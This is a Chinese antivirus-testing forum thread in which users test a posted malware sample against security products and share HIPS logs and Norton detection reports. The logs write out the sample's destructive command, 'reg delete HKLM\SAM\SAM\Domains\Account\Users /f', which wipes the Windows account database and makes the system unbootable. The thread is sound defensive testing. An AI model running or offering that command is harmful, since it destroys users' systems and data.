删除所有账户（包括内置账户）

显示全部楼层 · 发表于 2014-6-7 12:30:33

JokerJ 发表于 2014-6-7 12:17
你妈逼害得老子重装系统不得好死

楼主不是说了，要用影子或者虚拟机，你怎么实机双击了

显示全部楼层 · 发表于 2014-6-7 12:30:34

本帖最后由深山红叶__ 于 2014-6-7 12:36 编辑

hddu 发表于 2014-6-7 12:20
单独毒霸防御测试，毒霸拦截失败， HKLM\SAM\SAM\Domains\Account\Users被删除，
系统无法登录，重装。[:1 ...

悲哀，上PE吧

流星街发表于 2014-6-7 12:29:16
看清楚好不好!!楼主又不是没说明！自己点下去自己承担，骂楼主干嘛？？

感谢帮忙

vm001 发表于 2014-6-7 12:28:27
md的日志有的看不懂，不知道你那个记录哪个是展示这个修改权限的

2014-6-7 11:26:39 f:\fvirustest\test\test.exe 修改注册表项权限 HKEY_LOCAL_MACHINE\SAM\SAM 阻止 [注册表组]◆ 系统相关设置（阻止） -> [注册表]HKEY_LOCAL_MACHINE\SAM\*

Qutianshang 发表于 2014-6-7 12:29
是啊，可能是sp2有些不同，记得之前锁屏都很少对他有作用

看来sp2先天不足...

显示全部楼层 · 发表于 2014-6-7 12:33:09

hddu 发表于 2014-6-7 12:20
单独毒霸防御测试，毒霸拦截失败， HKLM\SAM\SAM\Domains\Account\Users被删除，
系统无法登录，重装。[:1 ...

请勿实机双击哦，就算是没有虚拟机最好也开一下影子之类的，那样比较安全

显示全部楼层 · 发表于 2014-6-7 12:43:48

实机重测，悲哀。

2014-06-07 12:29:01 运行应用程序    操作:允许
进程路径:C:\WINDOWS\explorer.exe
文件路径:C:\Documents and Settings\Administrator\桌面\Test\Test.exe
触发规则:应用程序规则->临时规则->*

2014-06-07 12:29:04 创建文件    操作:允许
进程路径:C:\Documents and Settings\Administrator\桌面\Test\Test.exe
文件路径:C:\Documents and Settings\Administrator\桌面\Test\KaFan Test.bat
触发规则:所有程序规则->Documents and Settings设置（二）->?:\Documents and Settings\*\桌面\*

2014-06-07 12:29:05 运行应用程序    操作:允许
进程路径:C:\Documents and Settings\Administrator\桌面\Test\Test.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c "KaFan Test.bat"
触发规则:应用程序规则->临时规则->*

2014-06-07 12:29:07 运行应用程序    操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/k reg delete HKLM\SAM\SAM\Domains\Account\Users /f
触发规则:应用程序规则->临时规则->*

2014-06-07 12:29:15 运行应用程序    操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\reg.exe
命令行:delete HKLM\SAM\SAM\Domains\Account\Users /f
触发规则:应用程序规则->临时规则->*

2014-06-07 12:29:15 删除注册表    操作:允许
进程路径:C:\WINDOWS\system32\reg.exe
注册表路径:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
注册表名称:[Key]
触发规则:应用程序规则->受保护的注册表->?:\*->HKEY_LOCAL_MACHINE\SAM\SAM*

2014-06-07 12:29:15 删除注册表    操作:允许
进程路径:C:\WINDOWS\system32\reg.exe
注册表路径:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
注册表名称:[Key]
触发规则:应用程序规则->受保护的注册表->?:\*->HKEY_LOCAL_MACHINE\SAM\SAM*

2014-06-07 12:29:15 删除注册表    操作:允许
进程路径:C:\WINDOWS\system32\reg.exe
注册表路径:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E8
注册表名称:[Key]
触发规则:应用程序规则->受保护的注册表->?:\*->HKEY_LOCAL_MACHINE\SAM\SAM*

2014-06-07 12:29:15 删除注册表    操作:允许
进程路径:C:\WINDOWS\system32\reg.exe
注册表路径:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator
注册表名称:[Key]
触发规则:应用程序规则->受保护的注册表->?:\*->HKEY_LOCAL_MACHINE\SAM\SAM*

2014-06-07 12:29:15 删除注册表    操作:允许
进程路径:C:\WINDOWS\system32\reg.exe
注册表路径:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
注册表名称:[Key]
触发规则:应用程序规则->受保护的注册表->?:\*->HKEY_LOCAL_MACHINE\SAM\SAM*

2014-06-07 12:29:15 删除注册表    操作:允许
进程路径:C:\WINDOWS\system32\reg.exe
注册表路径:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\HelpAssistant
注册表名称:[Key]
触发规则:应用程序规则->受保护的注册表->?:\*->HKEY_LOCAL_MACHINE\SAM\SAM*

2014-06-07 12:29:15 删除注册表    操作:允许
进程路径:C:\WINDOWS\system32\reg.exe
注册表路径:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
注册表名称:[Key]
触发规则:应用程序规则->受保护的注册表->?:\*->HKEY_LOCAL_MACHINE\SAM\SAM*

2014-06-07 12:29:15 删除注册表    操作:允许
进程路径:C:\WINDOWS\system32\reg.exe
注册表路径:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
注册表名称:[Key]
触发规则:应用程序规则->受保护的注册表->?:\*->HKEY_LOCAL_MACHINE\SAM\SAM*

2014-06-07 12:29:20 关闭/重启系统    操作:阻止
进程路径:C:\Documents and Settings\Administrator\桌面\Test\Test.exe

触发规则:应用程序规则->临时规则->*

显示全部楼层 · 发表于 2014-6-7 12:49:06

hddu 发表于 2014-6-7 12:43
实机重测，悲哀。

2014-06-07 12:29:01 运行应用程序操作:允许

不知道为何用Ntshutdown关机后上述删除REG的操作被回滚...

显示全部楼层 · 发表于 2014-6-7 13:29:50

给力的样本有没有人测试下火绒什么的呢。。

显示全部楼层 · 发表于 2014-6-7 13:54:45

文件名: test.exe
威胁名称: WS.Reputation.1
完整路径: c:\users\bob\appdata\local\temp\rar$dra0.534\test.exe

____________________________

详细信息
未知的社区使用情况, 未知的文件存在时间, 风险中

原始
下载自
https://att.kafan.cn/forum.php?mo ... Dg2NDkxM3wxNzQyNzc2

活动
已执行的操作: 已执行的操作: 1

____________________________

在电脑上的创建时间
不可用

上次使用时间
2014/6/7 ( 13:53:54 )

启动项目
否

已启动
否

____________________________

未知
诺顿社区中使用了此文件的用户数未知。

未知
此文件版本当前未知。

中
此文件具有中等程度风险。

威胁类型: 智能网络威胁。很多迹象表明此文件不可信任，不安全

____________________________

https://att.kafan.cn/forum.php?mo ... Dg2NDkxM3wxNzQyNzc2

已下载文件 test.exe 威胁名称: WS.Reputation.1
自 att.kafan.cn

来源: 外部介质

____________________________

文件操作

文件: c:\users\bob\appdata\local\temp\rar$dra0.534\ test.exe 已删除
____________________________

文件指纹 - SHA:
be252e54911ff12020792b2722357e870ffbc2946fc9f8e43d0f2c52d450dddd
文件指纹 - MD5:
不可用

显示全部楼层 · 发表于 2014-6-7 14:00:03

诺顿下载扫描

显示全部楼层 · 发表于 2014-6-7 14:00:09

本帖最后由消停于 2014-6-7 14:17 编辑

诺顿只删除了文件，但防御失败！

文件名: test.exe
威胁名称: SONAR.Heuristic.120
完整路径: 不可用
____________________________

详细信息
极少用户信任的文件, 极新的文件, 风险高

原始
下载自
未知

活动
已执行的操作: 6
____________________________

在电脑上的创建时间
2014-6-7 ( 13:56:26 )

上次使用时间
2014-6-7 ( 13:56:26 )

启动项目
否

已启动
是
____________________________

极少用户信任的文件
诺顿社区中有不到 5 名用户使用了此文件。

极新的文件
该文件已在不到 1 周前发行。

高
此文件具有高风险。

SONAR 主动防护监视电脑上的可疑程序活动。
____________________________

来源: 外部介质

源文件:
test.exe
____________________________

文件操作

文件: f:\norton样本\临时收集\ test.exe 已删除
文件: c:\Users\administrator\AppData\LocalLow\SogouPY\components\ componentconfig.ini 已删除
____________________________

注册表操作

注册表更改: HKEY_USERS\S-1-5-21-1071228153-3121885108-811120218-500\Software\ SogouInput.user->SogouComponentFirstLoad:1402120535 已修复
____________________________

系统设置操作

事件: 进程启动 (执行者 f:\norton样本\临时收集\test.exe, PID:5848) 未采取操作
事件: 进程启动: c:\Windows\System32\ cmd.exe, PID:5872 (执行者 f:\norton样本\临时收集\test.exe, PID:5848) 未采取操作
____________________________

可疑操作

(执行者 f:\norton样本\临时收集\test.exe, PID:5848) 未采取操作
____________________________

文件指纹 - SHA:
不可用
文件指纹 - MD5:
不可用

显示全部楼层 · 发表于 2014-6-7 14:03:30

楼主样本不错

同时鄙视一下18楼。

[病毒样本] 删除所有账户（包括内置账户）

浏览过的版块